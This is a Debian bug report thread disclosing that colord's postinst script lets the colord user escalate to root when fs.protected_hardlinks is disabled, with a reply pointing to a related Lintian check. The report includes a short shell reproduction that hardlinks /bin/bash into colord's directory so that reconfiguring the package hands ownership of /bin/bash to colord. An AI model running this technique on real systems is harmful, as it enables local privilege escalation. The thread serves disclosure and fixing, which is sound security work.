Bug#889060: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0
Hi Ansgar, > now hoping every other `chmod -R` call gets a CVE assigned See #889066 for a Lintian check for this. Regards, -- ,''`. : :' : Chris Lamb `. `'` la...@debian.org / chris-lamb.co.uk `-
Bug#889060: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0
Package: colord Version: 1.3.3-2 Severity: important Tags: security On systems with fs.protected_hardlinks=0 the postinst script allows escalation from the colord user to root: +--- | # sysctl fs.protected_hardlinks=0 | # runuser -u colord ln /bin/bash /var/lib/colord/bash | # ls -l /bin/bash | -rwxr-xr-x 2 root root 1099016 May 15 2017 /bin/bash | # dpkg-reconfigure colord | # ls -l /bin/bash | -rwxr-xr-x 2 colord colord 1099016 May 15 2017 /bin/bash +--- This is essentially the same problem as CVE-2017-18078. Ansgar (now hoping every other `chmod -R` call gets a CVE assigned)